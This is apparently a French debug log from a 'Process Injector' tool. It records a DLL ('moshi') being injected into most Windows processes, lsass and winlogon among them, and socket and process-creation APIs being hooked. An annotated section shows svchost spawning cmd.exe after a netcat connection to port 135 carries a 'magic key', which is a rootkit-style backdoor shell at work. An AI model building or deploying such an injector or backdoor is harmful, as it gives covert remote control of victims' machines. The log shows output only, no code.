
Process Injector 1.0 - Tolwin

Tentative d'attribution de privilege debug : 
succes

Erreur avec le processus [System Process] - 0
Erreur avec le processus System - 4
Erreur avec le processus smss.exe - 556
Succes avec le processus csrss.exe - 620
Succes avec le processus winlogon.exe - 644
Succes avec le processus services.exe - 688
Succes avec le processus lsass.exe - 700
Succes avec le processus svchost.exe - 876
Succes avec le processus svchost.exe - 968
Succes avec le processus svchost.exe - 1140
Succes avec le processus svchost.exe - 1152
Succes avec le processus spoolsv.exe - 1296
Succes avec le processus VMwareService.exe - 1452
Succes avec le processus explorer.exe - 128
Succes avec le processus VMwareTray.exe - 316
Succes avec le processus VMwareUser.exe - 328
Succes avec le processus msmsgs.exe - 336
Succes avec le processus wuauclt.exe - 172
Succes avec le processus cmd.exe - 508
Succes avec le processus ntvdm.exe - 2032
Succes avec le processus aa.exe - 392
Injection globale reussie
           csrss.exe   620- chargement de moshi
           csrss.exe   620- kernel32.dll hook
           csrss.exe   620- kernel32.dll:LoadLibraryA hook succes
           csrss.exe   620- kernel32.dll:FreeLibrary hook succes
           csrss.exe   620- kernel32.dll:CreateProcessInternalW hook succes
           csrss.exe   620- ws2_32.dll hook
           csrss.exe   620- WS2_32.dll:recv non charge, hook impossible
           csrss.exe   620- ws2_32.dll:recv hook echec
           csrss.exe   620- WS2_32.dll:WSARecv non charge, hook impossible
           csrss.exe   620- ws2_32.dll:WSARecv hook echec
           ntvdm.exe  2032- chargement de moshi
         wuauclt.exe   172- chargement de moshi
         svchost.exe   968- chargement de moshi
             cmd.exe   508- kernel32.dll hook
        explorer.exe   128- kernel32.dll hook
         svchost.exe   968- kernel32.dll hook
      VMwareUser.exe   328- kernel32.dll:LoadLibraryA hook succes
         wuauclt.exe   172- kernel32.dll:LoadLibraryA hook succes
         svchost.exe   968- kernel32.dll:LoadLibraryA ho                      
           ntvdm.exe  2032- ws2_32.dll hook
        explorer.exe   128- kernel32.dll:FreeLibrary hook succes
         svchost.exe   968- kernel32.dll:Free      
      VMwareUser.exe   328- w         wuauclt        
        services.exe   688- chargement de moshi
         svchost.exe   968- kernel32.dll:CreateProcessInternalW hook succes
         wuauclt.exe   172- ws2_32.dll hook
        services.exe   688- kernel32.dll:LoadLibraryA hook succes
         wuauclt.exe   172- ws2_32.dll:recv hook succes
             cmd.exe   508- ws2_32.dll:WSARecv hook echec
      VMwareUser.exe   328- ws2_32.dll:WSARecv hook echec
        services.exe   688- kernel32.dll:FreeLibrary hook succes
        services.exe   688- kernel32.dll:CreateProcessInternalW hook succes
        services.exe   688- ws2_32.dll hook
        services.exe   688- ws2_32.dll:recv hook succes
        services.exe   688- ws2_32.dll:WSARecv hook succes
         wuauclt.exe   172- ws2_32.dll:WSARecv hook succes
         spoolsv.exe  1296- chargement de moshi
         spoolsv.exe  1296- kernel32.dll hook
         spoolsv.exe  1296- kernel32.dll:LoadLibraryA hook succes
         spoolsv.exe  1296- kernel32.dll:FreeLibrary hook succes
         spoolsv.exe  1296- kernel32.dll:CreateProcessInternalW hook succes
         spoolsv.exe  1296- ws2_32.dll hook
         spoolsv.exe  1296- ws2_32.dll:recv hook succes
         spoolsv.exe  1296- ws2_32.dll:WSARecv hook succes
           lsass.exe   700- chargement de moshi
           lsass.exe   700- kernel32.dll hook
           lsass.exe   700- kernel32.dll:LoadLibraryA hook succes
           lsass.exe   700- kernel32.dll:FreeLibrary hook succes
           lsass.exe   700- kernel32.dll:CreateProcessInternalW hook succes
           lsass.exe   700- ws2_32.dll hook
           lsass.exe   700- ws2_32.dll:recv hook succes
           lsass.exe   700- ws2_32.dll:WSARecv hook succes
         svchost.exe   968- ws2_32.dll:recv hook succes
         svchost.exe   968- ws2_32.dll:WSARecv hook succes
        explorer.exe   128- ws2_32.dll:recv hook succes
        explorer.exe   128- ws2_32.dll:WSARecv hook succes
      VMwareTray.exe   316- chargement de moshi
      VMwareTray.exe   316- kernel32.dll hook
      VMwareTray.exe   316- kernel32.dll:LoadLibraryA hook succes
      VMwareTray.exe   316- kernel32.dll:FreeLibrary hook succes
      VMwareTray.exe   316- kernel32.dll:CreateProcessInternalW hook succes
      VMwareTray.exe   316- ws2_32.dll hook
      VMwareTray.exe   316- WS2_32.dll:recv non charge, hook impossible
      VMwareTray.exe   316- ws2_32.dll:recv hook echec
      VMwareTray.exe   316- WS2_32.dll:WSARecv non charge, hook impossible
      VMwareTray.exe   316- ws2_32.dll:WSARecv hook echec
   VMwareService.exe  1452- chargement de moshi
   VMwareService.exe  1452- kernel32.dll hook
   VMwareService.exe  1452- kernel32.dll:LoadLibraryA hook succes
   VMwareService.exe  1452- kernel32.dll:FreeLibrary hook succes
   VMwareService.exe  1452- kernel32.dll:CreateProcessInternalW hook succes
   VMwareService.exe  1452- ws2_32.dll hook
   VMwareService.exe  1452- ws2_32.dll:recv hook succes
   VMwareService.exe  1452- ws2_32.dll:WSARecv hook succes
         svchost.exe   876- chargement de moshi
         svchost.exe   876- kernel32.dll hook
         svchost.exe   876- kernel32.dll:LoadLibraryA hook succes
         svchost.exe   876- kernel32.dll:FreeLibrary hook succes
         svchost.exe   876- kernel32.dll:CreateProcessInternalW hook succes
         svchost.exe   876- ws2_32.dll hook
         svchost.exe   876- ws2_32.dll:recv hook succes
         svchost.exe   876- ws2_32.dll:WSARecv hook succes
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
          msmsgs.exe   336- chargement de moshi
          msmsgs.exe   336- kernel32.dll hook
          msmsgs.exe   336- kernel32.dll:LoadLibraryA hook succes
          msmsgs.exe   336- kernel32.dll:FreeLibrary hook succes
          msmsgs.exe   336- kernel32.dll:CreateProcessInternalW hook succes
          msmsgs.exe   336- ws2_32.dll hook
          msmsgs.exe   336- ws2_32.dll:recv hook succes
          msmsgs.exe   336- ws2_32.dll:WSARecv hook succes
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?

***** ***** C'est ici que ça se passe ***** *****

	1) Lancement de netcat
             cmd.exe   508- appel  CreateProcessInternalW -> 1976:nc localhost 135

	2) NetCat se fait parasiter
              nc.exe  1976- chargement de moshi
              nc.exe  1976- kernel32.dll hook
              nc.exe  1976- kernel32.dll:LoadLibraryA hook succes
              nc.exe  1976- kernel32.dll:FreeLibrary hook succes
              nc.exe  1976- kernel32.dll:CreateProcessInternalW hook succes
              nc.exe  1976- ws2_32.dll hook
              nc.exe  1976- ws2_32.dll:recv hook succes
              nc.exe  1976- ws2_32.dll:WSARecv hook succes

	3) Netcat charge ses dépendances
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\mswsock.dll
              nc.exe  1976- appel  LoadLibraryA -> DNSAPI.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\winrnr.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\mswsock.dll
              nc.exe  1976- appel  LoadLibraryA -> rasadhlp.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\system32\mswsock.dll
              nc.exe  1976- appel  LoadLibraryA -> C:\WINDOWS\System32\mswsock.dll

	4) Svchost écoute sur le port 135
         svchost.exe   876- Appel a WSARecv : 1 buffers, completion routine 0x00000000
         svchost.exe   876- Appel a WSARecv : ReturnVal -1
         svchost.exe   876- Appel a WSARecv : 1 buffers, completion routine 0x00000000
         svchost.exe   876- Appel a WSARecv : ReturnVal -1

	5) Ce coup-ci est la bonne : svchost exécute le shell
         svchost.exe   876- WSARecv (err / pending) detecte magic key dans buffer 0 avant l'offset
         svchost.exe   876- appel  CreateProcessInternalW -> 440:cmd.exe

	6) Le shell est contaminé
             cmd.exe   440- chargement de moshi
             cmd.exe   440- kernel32.dll hook
             cmd.exe   440- kernel32.dll:LoadLibraryA hook succes
             cmd.exe   440- kernel32.dll:FreeLibrary hook succes
             cmd.exe   440- kernel32.dll:CreateProcessInternalW hook succes
             cmd.exe   440- ws2_32.dll hook
             cmd.exe   440- WS2_32.dll:recv non charge, hook impossible
             cmd.exe   440- ws2_32.dll:recv hook echec
             cmd.exe   440- WS2_32.dll:WSARecv non charge, hook impossible
             cmd.exe   440- ws2_32.dll:WSARecv hook echec
             cmd.exe   440- appel  LoadLibraryA -> ADVAPI32.dll
              nc.exe  1976- Appel a WSARecv : 1 buffers, completion routine 0x00000000
              nc.exe  1976- Appel a WSARecv : ReturnVal 0

	7) On quitte le shell
             cmd.exe   440- fermeture de moshi
             cmd.exe   440- kernel32.dll libération
              nc.exe  1976- Appel a WSARecv : 1 buffers, completion routine 0x00000000
              nc.exe  1976- Appel a WSARecv : ReturnVal 0
         svchost.exe   876- Appel a WSARecv : 1 buffers, completion routine 0x00000000
         svchost.exe   876- Appel a WSARecv : ReturnVal -1

	8) Et NetCat se ferme dans la foulée
              nc.exe  1976- fermeture de moshi
              nc.exe  1976- kernel32.dll libération

	9) On ferme la ligne de commande ayant lancé netcat
             cmd.exe   508- fermeture de moshi
             cmd.exe   508- kernel32.dll libération

***** ***** Fin de la partie à looker ***** *****

        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> MSGINA.dll
        explorer.exe   128- appel  LoadLibraryA -> MSIMG32.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> WINSTA.dll
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
      VMwareTray.exe   316- appel  LoadLibraryA -> advapi32.dll
      VMwareTray.exe   316- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  CreateProcessInternalW -> 1812:logonui.exe /status /shutdown
         logonui.exe  1812- chargement de moshi
         logonui.exe  1812- kernel32.dll hook
         logonui.exe  1812- kernel32.dll:LoadLibraryA hook succes
         logonui.exe  1812- kernel32.dll:FreeLibrary hook succes
         logonui.exe  1812- kernel32.dll:CreateProcessInternalW hook succes
         logonui.exe  1812- ws2_32.dll hook
         logonui.exe  1812- WS2_32.dll:recv non charge, hook impossible
         logonui.exe  1812- ws2_32.dll:recv hook echec
         logonui.exe  1812- WS2_32.dll:WSARecv non charge, hook impossible
         logonui.exe  1812- ws2_32.dll:WSARecv hook echec
         logonui.exe  1812- appel  FreeLibrary -> ?
         logonui.exe  1812- appel  FreeLibrary -> ?
         logonui.exe  1812- appel  LoadLibraryA -> user32.dll
         logonui.exe  1812- appel  LoadLibraryA -> UxTheme.dll
         logonui.exe  1812- appel  LoadLibraryA -> CLBCATQ.DLL
         logonui.exe  1812- appel  LoadLibraryA -> CLBCATQ.DLL
         logonui.exe  1812- appel  LoadLibraryA -> WINSTA.dll
         logonui.exe  1812- appel  LoadLibraryA -> NETAPI32.dll
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  LoadLibraryA -> browseui.dll
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        explorer.exe   128- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> WS2_32.dll
        winlogon.exe   644- ws2_32.dll hook
        winlogon.exe   644- ws2_32.dll:recv hook succes
        winlogon.exe   644- ws2_32.dll:WSARecv hook succes
        winlogon.exe   644- appel  LoadLibraryA -> WLDAP32.dll
         svchost.exe   968- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> CLBCATQ.DLL
        winlogon.exe   644- appel  LoadLibraryA -> CLBCATQ.DLL
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> shfolder.dll
        winlogon.exe   644- appel  LoadLibraryA -> shell32.dll
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  LoadLibraryA -> MPRUI.dll
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
        winlogon.exe   644- appel  FreeLibrary -> ?
         svchost.exe   968- appel  CreateProcessInternalW -> 616:rundll32.exe shell32.dll,Activate_RunDLL
        rundll32.exe   616- chargement de moshi
        rundll32.exe   616- kernel32.dll hook
        rundll32.exe   616- kernel32.dll:LoadLibraryA hook succes
        rundll32.exe   616- kernel32.dll:FreeLibrary hook succes
        rundll32.exe   616- kernel32.dll:CreateProcessInternalW hook succes
        rundll32.exe   616- ws2_32.dll hook
        rundll32.exe   616- WS2_32.dll:recv non charge, hook impossible
        rundll32.exe   616- ws2_32.dll:recv hook echec
        rundll32.exe   616- WS2_32.dll:WSARecv non charge, hook impossible
        rundll32.exe   616- ws2_32.dll:WSARecv hook echec
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- appel  FreeLibrary -> ?
        rundll32.exe   616- fermeture de moshi
        rundll32.exe   616- kernel32.dll libération
        winlogon.exe   644- appel  LoadLibraryA -> RASAPI32.dll
        winlogon.exe   644- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  FreeLibrary -> ?
         spoolsv.exe  1296- fermeture de moshi
         spoolsv.exe  1296- kernel32.dll libération
   VMwareService.exe  1452- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  FreeLibrary -> ?
           lsass.exe   700- appel  FreeLibrary -> ?
           lsass.exe   700- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  FreeLibrary -> ?
   VMwareService.exe  1452- appel  LoadLibraryA -> USER32.dll
   VMwareService.exe  1452- fermeture de moshi
   VMwareService.exe  1452- kernel32.dll libération
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         svchost.exe   968- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         wuauclt.exe   172- appel  FreeLibrary -> ?
         wuauclt.exe   172- fermeture de moshi
         wuauclt.exe   172- kernel32.dll libération
